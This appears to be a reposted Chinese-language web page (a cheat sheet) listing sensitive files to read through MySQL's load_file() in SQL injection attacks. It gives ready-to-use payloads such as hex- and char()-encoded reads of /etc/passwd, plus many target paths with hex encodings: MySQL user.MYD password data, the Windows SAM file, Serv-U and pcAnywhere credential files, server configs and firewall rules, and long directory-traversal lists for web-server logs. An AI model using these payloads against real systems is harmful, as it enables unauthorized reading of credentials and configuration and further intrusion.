2. 程式人生 > >常見的load_file()讀取的敏感資訊

常見的load_file()讀取的敏感資訊

阿新 發佈:2018-11-01

轉自慕課大巴

 

 

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面兩個是檢視一個PHP檔案裡完全顯示程式碼.有些時候不替換一些字元,如 “<” 替換成”空格” 返回的是網頁.而無法檢視到程式碼.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系統根目錄

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 檢視linux APACHE虛擬主機配置檔案

5、c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf  檢視WINDOWS系統apache檔案

6、c:/Resin-3.0.14/conf/resin.conf   檢視jsp開發的網站 resin檔案配置資訊.

7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 檢視linux系統配置的JSP虛擬主機

8、d:\APACHE\Apache2\conf\httpd.conf

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php  phpmyadmin 爆路徑

11、 c:\windows\system32\inetsrv\MetaBase.xml 檢視IIS的虛擬主機配置檔案

12、 /usr/local/resin-3.0.22/conf/resin.conf  針對3.0.22的RESIN配置檔案檢視

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虛擬主機檢視

15、 /etc/sysconfig/iptables 本看防火牆策略

16 、 /usr/local/app/php5 b/php.ini  PHP 的相當設定

17 、/etc/my.cnf  MYSQL的配置檔案

18、 /etc/redhat-release   紅帽子的系統版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系統中的使用者密碼

20、/etc/sysconfig/network-scripts/ifcfg-eth0 檢視IP.

21、/usr/local/app/php5 b/php.ini //PHP相關設定

22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虛擬網站設定

23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini

25、/etc/issue 顯示Linux核心的發行版本資訊

26、/etc/ftpuser

27、檢視LINUX使用者下的操作記錄檔案.bash_history 或 .bash_profile

28、/etc/ssh/ssh_config


/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/etc/mail/access
/etc/my.cnf
/var/run/utmp
/var/log/wtmp


../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log       
/var/log/httpd/error_log     
../apache/logs/error.log     
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

WINDOWS下:

c:/boot.ini          //檢視系統版本     0x633A2F626F6F742E696E690D0A
c:/windows/system32/boot.bat
c:/windows/php.ini   //php配置資訊      0x633A2F77696E646F77732F7068702E696E69

c:/windows/my.ini    //MYSQL配置檔案,記錄管理員登陸過的MYSQL使用者名稱和密碼  0x633A2F77696E646F77732F6D792E696E69

c:/winnt/php.ini      0x633A2F77696E6E742F7068702E696E69

c:/winnt/my.ini       0x633A2F77696E6E742F6D792E696E69

c:\mysql\data\mysql\user.MYD  //儲存了mysql.user表中的資料庫連線密碼  0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //儲存了虛擬主機網站路徑和密碼

0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69
 
c:\Program Files\Serv-U\ServUDaemon.ini   0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69

c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置檔案

c:\windows\repair\sam  //儲存了WINDOWS系統初次安裝的密碼

c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理員密碼儲存於此

c:\Program Files\RhinoSoft.com\ServUDaemon.exe

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif  檔案

//儲存了pcAnywhere的登陸密碼

c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //檢視     WINDOWS系統apache檔案   
0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66

c:/Resin-3.0.14/conf/resin.conf   //檢視jsp開發的網站 resin檔案配置資訊.  0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66

c:/Resin/conf/resin.conf  0x633A2F526573696E2F636F6E662F726573696E2E636F6E66


/usr/local/resin/conf/resin.conf 檢視linux系統配置的JSP虛擬主機  0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66

d:\APACHE\Apache2\conf\httpd.conf  0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66

C:\Program Files\mysql\my.ini  0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69

c:\windows\system32\inetsrv\MetaBase.xml 檢視IIS的虛擬主機配置    0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C

C:\mysql\data\mysql\user.MYD 存在MYSQL系統中的使用者密碼  0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944


LUNIX/UNIX下:

/etc/passwd  0x2F6574632F706173737764

/usr/local/app/apache2/conf/httpd.conf //apache2預設配置檔案  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網站設定  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/usr/local/app/php5/lib/php.ini //PHP相關設定   0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/etc/sysconfig/iptables //從中得到防火牆規則策略  0x2F6574632F737973636F6E6669672F69707461626C657320

/etc/httpd/conf/httpd.conf // apache配置檔案    0x2F6574632F68747470642F636F6E662F68747470642E636F6E66   
 
/etc/rsyncd.conf //同步程式配置檔案              0x2F6574632F7273796E63642E636F6E66

/etc/my.cnf //mysql的配置檔案   0x2F6574632F6D792E636E66

/etc/redhat-release //系統版本   0x2F6574632F7265646861742D72656C65617365

/etc/issue           0x2F6574632F6973737565

/etc/issue.net       0x2F6574632F69737375652E6E6574
 
/usr/local/app/php5/lib/php.ini //PHP相關設定  0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網站設定   0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 檢視linux APACHE虛擬主機配置檔案  0x2F6574632F68747470642F636F6E662F68747470642E636F6E66

0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66

/usr/local/resin-3.0.22/conf/resin.conf  針對3.0.22的RESIN配置檔案檢視  0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上   0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虛擬主機檢視  

0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66


/etc/sysconfig/iptables 檢視防火牆策略 0x2F6574632F737973636F6E6669672F69707461626C6573

load_file(char(47))  列出FreeBSD,Sunos系統根目錄


replace(load_file(0x2F6574632F706173737764),0x3c,0x20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面兩個是檢視一個PHP檔案裡完全顯示程式碼.有些時候不替換一些字元,如 "<" 替換成"空格" 返回的是網頁.而無法檢視到程式碼.

相關推薦

常見load_file()讀取敏感資訊

轉自慕課大巴     1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60

python+selenium常見例項-如何從TXT文件中讀取使用者資訊

1、分開成每一條,然後轉化成字典 confg=open的檔案 for line in config: 每行進行分割---------例如下面,根據=分割,並且列表解析,防止有回車 result=【ele.strip( ) for ele in line.split

2.我的第一個小程式(獲取使用者資訊--包括敏感資訊

小友初學微信小程式開發,如果有些問題不對,請指出,謝謝   我還是來說一下我的學習之路吧!!!   原始碼地址: 密碼:luh0   1.在開發小程式的時候,我們需要吧開發工具中的不校驗合法域名、web-view(業務域名)、TLS 版本以及 HTTPS 證書這個給

logstash 讀取日誌資訊輸出到elasticsearch完成查詢

1 新建test2.conf檔案 input { file { path =>"/soft/elasticsearch-6.4.3/logs/elasticsearch.log"#elasticsearch日誌資訊 #codec =>"js

k8s的敏感資訊管理

  應用啟動過程中可能需要一些敏感資訊,比如訪問資料庫的使用者名稱密碼或者祕鑰。將這些資訊直接儲存在容器映象中顯然不妥,Kubernetes 提供的解決方案是 Secret。 Secret 會以密文的方式儲存資料,避免了直接在配置檔案中儲存敏感資訊。Secret 會以 Volume 的形式被 m

HTTP頭部請求例項——使用HttpServletRequest類的getHeaderNames()方法來讀取HTTP資訊

這個方法以列舉的形式返回當前HTTP請求的頭資訊 獲取Enumeration物件後 用標準的方式來遍歷Enumeration物件 用hasMoreElements()方法來確定什麼時候停止 然後再用nextElement()方法來獲得每個引數的名字。 在eclipse裡面新建一個動態we

Python 讀取資料庫資訊

# user/bin/python3 import mysql.connector # 連結資料庫 db = mysql.connector.connect( host = '這裡填資料庫地址', user = '這裡填使用者名稱', password = '這裡填資料庫

資料加密給敏感資訊加把鎖,讓資料不再裸奔

資料加密是資訊保安的核心技術之一,它主要用於保障資料在不安全環境中的安全儲存和傳輸。 比如在使用公共、無線網路裡或沒有加密的網路環境裡,你的帳號或資料就有可能會被非法劫持甚至公佈。 通過資料加密,我們裝置中的敏感資訊將變成一堆亂碼。即使公佈這堆亂碼,也只有你的那個TA才能讀懂它的真正內容

關於微信企業付款到零錢X509Certificate2讀取證書資訊,釋出到伺服器訪問不到的解決方案

  最近做了一個通過呼叫微信企業付款到使用者零錢的功能,真的挺奇怪的,在我本地除錯的時候都沒有問題,但是當我釋出到服務上的時候卻一直無法讀取到我的證書資訊。讀取的程式碼如下,使用的是微信官方文件提供的X509Certificate2讀取證書的方法: string path = AppDom

application.properties資料庫敏感資訊加密這麼簡單?

寫在前面 俗話說:”顧客是上帝“,身為程式設計師的我有時會直接對接客戶方提出的需求,畢竟我處在提供服務的一方,所以我也會盡量的滿足臨時的要求。前些天就有了一個滿足漏洞檢測的需求,想要把資料庫的明文敏感資訊加密,其實也就是密碼加密,所以也就有了這篇文章,我的專案是springboot結構,修改其實也挺簡單,廢話

[微信開發] - 從最新的appid,appsecret讀取配置資訊

設定好form表單,填寫引數傳入Java後端做為例項bean,接著儲存倒資料庫. 當微信端介面配置提交時,Java介面從資料庫獲取最新的配置資訊,可以根據increaseID,也可以設定時間段, 這裡的問題是,在獲取例項的那條SQL語句找不到了, selectByIncreaseId() 

IMSI-catcher:可發現附近手機敏感資訊的工具

    嚴正宣告:該工具主要是為了讓大家更好的瞭解GSM網路的工作原理而設計開發的,請不要用於惡意目的! 前言 IMSI-catcher是一個可以幫助你發現附近手機的IMSI號碼,國家,品牌和運營商等資訊的工具。 你需要準備的裝置

php小程式登入時解密getUserInfo獲取openId和unionId等敏感資訊

在獲取之前先了解一下openId和unionId openId : 使用者在當前小程式的唯一標識  unionId : 如果開發者擁有多個移動應用、網站應用、和公眾帳號(包括小程式),可通過unionid來區分使用者的唯一性,因為只要是同一個微信開放平臺帳號下的移動應用、網站應用和公眾帳號(

Shiro學習筆記——資料庫讀取許可權資訊(不使用硬編碼的方式)

在ShiroFilterFactoryBean初始化的過程中,會執行一個setFilterChainDefinitionMap方法,傳入了一個Map,該Map就是URL與許可權的對應關係。 編寫一個例

電商大資料分析平臺(三)nginx配置及flume讀取日誌資訊

一、nginx配置 在本專案中nginx的作用只是接收客戶端傳送的事件,並將相應的session寫入日誌檔案中,所以配置較為簡單,只需要配置寫入的日誌檔案和寫入的格式 1.地址配置 server { listen

web安全/滲透測試--52--敏感資訊洩漏

1、漏洞描述: 敏感資料包括但不限於:口令、金鑰、證書、會話標識、License、隱私資料(如短訊息的內容)、授權憑據、個人資料(如姓名、住址、電話等)等,在程式檔案、配置檔案、日誌檔案、備份檔案及資料庫中都有可能包含敏感資料。 2、檢測方法 1、檢測形式多樣,

業務邏輯漏洞探索之敏感資訊洩露

業務邏輯漏洞探索之敏感資訊洩露 本文中提供的例子均來自網路已公開測試的例子,僅供參考。近期,萬豪酒店被爆近5億客人的資訊或洩露。近年來,使用者隱私洩露事件時有發生,也不得不給我們敲響警鐘。敏感資訊時業務系統中的保密性要求較高的資料,通常包括系統敏感資訊和引用敏感資訊。系統敏感資訊指的是業務系統本身的基礎環境

如何收集常見的前端效能資訊

前端效能指標,大多有TTFB ,首屏,首次可互動時間等 相關的文章已經有很多,細節這裡就不多說了,可參考文末資料   總體來說,需要知道瀏覽器(新的)給我們提供了 Performance API,使用這個屬性,我們可以得到一系列跟效能相關的資料 結合各個時間點的意義,我們可以計算出關鍵的耗時

手機號隱藏中間四位、使用者名稱處理、銀行卡擷取後四位等敏感資訊處理工具類

在我們平常開發中,我們有時候需要對使用者名稱、手機號等資訊進行一些敏感資訊的處理(如:王小五 →王*五),還有銀行卡擷取後四位等,這裡我整理成了一個工具類,分享給大家! /** * 敏感資訊處理工具類 * @author Zhang */ public final c

sql注入中常見的報錯資訊

sql注入是我們常見的ctf的web型別題目,因此我們在做這類題時經常會在頁面上返回錯誤資訊,因此熟悉一些常見的sql注入資訊是很重要的,下面我介紹一些自己常遇到的mysql報錯資訊。 我們在頁面上返回的錯誤資訊不僅僅只有mysql返回的,可能還有伺服器返回的,因此我僅